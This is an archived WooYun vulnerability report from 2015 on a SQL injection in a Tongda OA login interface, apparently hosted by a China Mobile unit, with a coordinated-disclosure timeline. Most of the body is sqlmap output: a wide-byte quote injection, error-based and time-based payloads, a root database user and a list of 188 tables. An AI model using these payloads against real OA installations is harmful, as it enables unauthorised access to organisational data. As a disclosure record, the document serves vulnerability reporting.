乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-20: 细节已通知厂商并且等待厂商处理中 2015-10-23: 厂商已经确认,细节仅向厂商公开 2015-11-02: 细节向核心白帽子及相关领域专家公开 2015-11-12: 细节向普通白帽子公开 2015-11-22: 细节向实习白帽子公开 2015-12-07: 细节向公众公开
**.**.**.**/
sqlmap.py -u "**.**.**.**/interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20"
sqlmap resumed the following injection point(s) from stored session:---Parameter: USER_ID (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 5032 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5032=5032,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DrsC Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT * FROM (SELECT(SLEEP(5)))ZYuK)-- Bouq---web server operating system: Windowsweb application technology: PHP 5.2.10, Apache 2.2.11back-end DBMS: MySQL 5.0current database: 'td_oa'sqlmap resumed the following injection point(s) from stored session:---Parameter: USER_ID (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 5032 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5032=5032,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DrsC Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT * FROM (SELECT(SLEEP(5)))ZYuK)-- Bouq---web server operating system: Windowsweb application technology: PHP 5.2.10, Apache 2.2.11back-end DBMS: MySQL 5.0current user: 'root@**.**.**.**'sqlmap resumed the following injection point(s) from stored session:---Parameter: USER_ID (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 5032 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5032=5032,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DrsC Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT * FROM (SELECT(SLEEP(5)))ZYuK)-- Bouq---web server operating system: Windowsweb application technology: PHP 5.2.10, Apache 2.2.11back-end DBMS: MySQL 5.0Database: td_oa[188 tables]+----------------------+| user || version || address || address_group || affair || app_config || app_log || attachment_edit || attend_config || attend_duty || attend_evection || attend_holiday || attend_leave || attend_manager || attend_out || bbs_board || bbs_comment || book_info || book_manage || book_manager || book_type || bs_line || calendar || categories_type || censor_data || censor_module || censor_words || chatroom || contact || contract || contract_line || countdown || cp_asset_type || cp_assetcfg || cp_cptl_info || cp_dpct_sub || cp_prcs_prop || customer || department || diary || diary_comment || diary_comment_reply || efax_account || efax_receive_box || efax_send_box || email || email_body || email_box || exam_data || exam_flow || exam_paper || exam_quiz || exam_quiz_set || ext_user || field_date || fieldsetting || file_content || file_sort || flow_form_type || flow_print_tpl || flow_process || flow_query_tpl || flow_rule || flow_run || flow_run_data || flow_run_feedback || flow_run_log || flow_run_prcs || flow_sort || flow_timer || flow_type || hrms || icqcontact_tb || icqmsgs_tb || icqservermsg_tb || interface || ip_rule || linkman || meeting || meeting_equipment || meeting_room || module_priv || mytable || netchat || netdisk || netmeeting || news || news_comment || notes || notify || oa_source || oa_source_used || oc_log || office_products || office_task || office_transhistory || order_line || picture || plan_type || product || proj_bug || proj_comment || proj_cost || proj_file || proj_file_log || proj_file_sort || proj_forum || proj_priv || proj_project || proj_task || proj_task_log || provider || provider_linkman || rms_file || rms_lend || rms_roll || rms_roll_room || rsa_keypair || sal_data || sal_flow || sal_item || sale_history || sale_manager || score_date || score_flow || score_group || score_item || seal || seal_keylic || seal_log || secure_key || service || sms || sms2 || sms2_priv || sms3 || sms_body || supply_history || supply_order || sys_code || sys_function || sys_log || sys_menu || sys_para || task || train_apply || train_appoint_muster || train_assess_data || train_assess_item || train_assess_title || train_courses || train_ctype || train_info || train_mail || train_manager || train_newcourse || train_survey_data || train_survey_item || train_survey_title || train_teachers || train_ttype || uni1 || unit || url || user_group || user_online || user_priv || vehicle || vehicle_maintenance || vehicle_operator || vehicle_usage || versio1 || vi_flow_run || vi_user || vote_data || vote_item || vote_title || webmail || wiki_ask || wiki_ask_answer || wiki_comment || wiki_info || winexe || word_model || work_detail || work_person || work_plan || zl_file |+----------------------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-23 11:42
CNVD确认并复现所述情况,已经转由CNCERT向中国一=移动集团公司通报,由其后续协调网站管理部门处置.
暂无